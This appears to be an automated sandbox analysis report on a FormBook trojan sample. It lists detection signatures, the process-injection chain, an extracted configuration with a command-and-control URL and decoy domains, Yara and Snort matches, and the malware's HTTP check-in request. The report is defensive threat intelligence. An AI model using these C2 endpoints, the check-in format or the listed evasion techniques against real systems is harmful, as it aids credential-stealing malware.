Windows Analysis Report
O1ySvN9SvL

Overview

General Information

Sample Name: O1ySvN9SvL (renamed file extension from none to exe)
Analysis ID: 635319
MD5: caa4c5d863a9324fa6b3a735ed446897
SHA1: 003348501064dc5646b19019592f8aefa4b44f5b
SHA256: 6796f10e7f6140f26a49bf9446b2c75dfe0e6dc7d7d88cad5e09d9b608107851
Tags: 32, exe, Formbook, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • O1ySvN9SvL.exe (PID: 6268 cmdline: "C:\Users\user\Desktop\O1ySvN9SvL.exe" MD5: CAA4C5D863A9324FA6B3A735ED446897)
    • zrztlh.exe (PID: 5816 cmdline: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx MD5: 917BF3E1E68704B188F2192850C76FA6)
      • zrztlh.exe (PID: 6000 cmdline: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx MD5: 917BF3E1E68704B188F2192850C76FA6)
        • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • NETSTAT.EXE (PID: 6124 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
            • cmd.exe (PID: 6396 cmdline: /c del "C:\Users\user\AppData\Local\Temp\zrztlh.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.knoxvillehojo.com/a5vu/"], "decoy": ["larrysormonddaytona.com", "stagify.net", "polyesterwadding.com", "smartcontractauditing.xyz", "pier88lasvegas.com", "albertapainters.com", "mujid24s.com", "tidyaghast.com", "viatempo.com", "gzqgc.com", "pragmatic168.pro", "gapeminimalistic.online", "bloomingbeauties247.com", "thaiperty.com", "thebrocab.com", "dinkycars.net", "alphamaio.com", "skoolksa.com", "kongresprawnikow.info", "cryptoinvestment.gold", "datcapark.com", "ashleystawart.com", "allure-selectshop.com", "uranolite.xyz", "zjgw88.com", "jimsvarietyshop.com", "visual-industry.com", "inboxburn.xyz", "rrew.tools", "denizdenobjeler.com", "infoshope.com", "50mim6.com", "zdcx123.com", "668400.com", "authopro.xyz", "techwebsite.tech", "bluelioninvestments.com", "loncheraspanama.com", "legalnurseresearch.net", "leonwarrencapital.com", "456837.com", "killercatsss.com", "alpha-farmers.info", "myoilomega.com", "lavid.life", "toxicwaterclaims.com", "xiaoqimz.xyz", "nights.life", "digsbury.ventures", "apclimo.com", "tinasglorybutter.com", "savingshk.com", "chanongrouptowercrane.com", "ugcuk.com", "saint-leo.com", "jiujiecanyin.com", "santamariaweddings.com", "mandap.xyz", "saigonloving.com", "huntingblindbrackets.com", "myjurorapp.com", "multiconnectico.com", "xn--oy2ay6s.xn--55qx5d", "businessvlogging.com"]}
Source | Rule | Description | Author | Strings
0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |

Source | Rule | Description | Author | Strings
2.0.zrztlh.exe.400000.6.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
2.0.zrztlh.exe.400000.6.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
2.0.zrztlh.exe.400000.6.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
2.0.zrztlh.exe.400000.8.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
2.0.zrztlh.exe.400000.8.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
          No Sigma rule has matched
          Timestamp: 05/27/22-19:11:52.547625
          SID: 2031449
          Source IP: 192.168.2.5
          Source Port: 49798
          Destination IP: 188.114.97.3
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 05/27/22-19:11:52.547625
          SID: 2031412
          Source IP: 192.168.2.5
          Source Port: 49798
          Destination IP: 188.114.97.3
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 05/27/22-19:11:52.547625
          SID: 2031453
          Source IP: 192.168.2.5
          Source Port: 49798
          Destination IP: 188.114.97.3
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          AV Detection

          Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: FormBook (configuration as listed above)
          Source: O1ySvN9SvL.exe, Virustotal: Detection: 49%
          Source: O1ySvN9SvL.exe, ReversingLabs: Detection: 53%
          Source: Yara match, File source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: www.knoxvillehojo.com/a5vu/, Avira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe, ReversingLabs: Detection: 50%
          Source: 1.2.zrztlh.exe.730000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.zrztlh.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.zrztlh.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.zrztlh.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.zrztlh.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: O1ySvN9SvL.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: netstat.pdbGCTL source: zrztlh.exe, 00000002.00000002.533807993.00000000030C0000.00000040.10000000.00040000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532341402.0000000000D99000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\bbzbv\zvllpn\ulml\6c213aee395f4218a983d22c1476bfe1\cpuiyl\nereonvn\Release\nereonvn.pdb source: O1ySvN9SvL.exe, 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp, O1ySvN9SvL.exe, 00000000.00000002.476520590.0000000002857000.00000004.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000001.00000000.435751978.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp, zrztlh.exe, 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp, zrztlh.exe, 00000002.00000000.441820881.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp, NETSTAT.EXE, 0000000A.00000002.719075583.000000000385F000.00000004.10000000.00040000.00000000.sdmp, zrztlh.exe.0.dr, nsr4D4E.tmp.0.dr
          Source: Binary string: netstat.pdb source: zrztlh.exe, 00000002.00000002.533807993.00000000030C0000.00000040.10000000.00040000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532341402.0000000000D99000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: zrztlh.exe, 00000001.00000003.439382237.0000000002430000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000001.00000003.440475430.000000001D330000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000003.449985411.000000000108A000.00000004.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532918261.000000000133F000.00000040.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532513113.0000000001220000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.533826728.0000000003199000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.532287288.0000000000E78000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: zrztlh.exe, 00000001.00000003.439382237.0000000002430000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000001.00000003.440475430.000000001D330000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000003.449985411.000000000108A000.00000004.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532918261.000000000133F000.00000040.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532513113.0000000001220000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.533826728.0000000003199000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.532287288.0000000000E78000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe, Code function: 0_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405426
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe, Code function: 0_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405D9C
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe, Code function: 0_2_004026A1 FindFirstFileA,0_2_004026A1
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe, Code function: 4x nop then pop edi, 2_2_0040E454
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe, Code function: 4x nop then pop edi, 2_2_0040E481
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe, Code function: 4x nop then pop edi, 2_2_00417D7E
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop edi, 10_2_007CE454
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop edi, 10_2_007CE481
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop edi, 10_2_007D7D7E

          Networking

          Source: C:\Windows\explorer.exe, Domain query: www.savingshk.com
          Source: C:\Windows\explorer.exe, Network Connect: 188.114.97.3 80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49798 -> 188.114.97.3:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49798 -> 188.114.97.3:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49798 -> 188.114.97.3:80
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: Malware configuration extractor, URLs: www.knoxvillehojo.com/a5vu/
          Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global traffic, HTTP traffic detected:
            GET /a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3Sf9IrYXmxrDB/U5IQUf HTTP/1.1
            Host: www.savingshk.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: NETSTAT.EXE, 0000000A.00000002.719201108.0000000003D4F000.00000004.10000000.00040000.00000000.sdmp, String found in binary or memory: https://www.savingshk.com/a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3S
          Source: unknown, DNS traffic detected: queries for: www.savingshk.com
          Source: O1ySvN9SvL.exe, 00000000.00000002.476364274.000000000072A000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exe, Code function: 0_2_00404FDD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FDD

          E-Banking Fraud

          Source: Yara match, File source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: O1ySvN9SvL.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
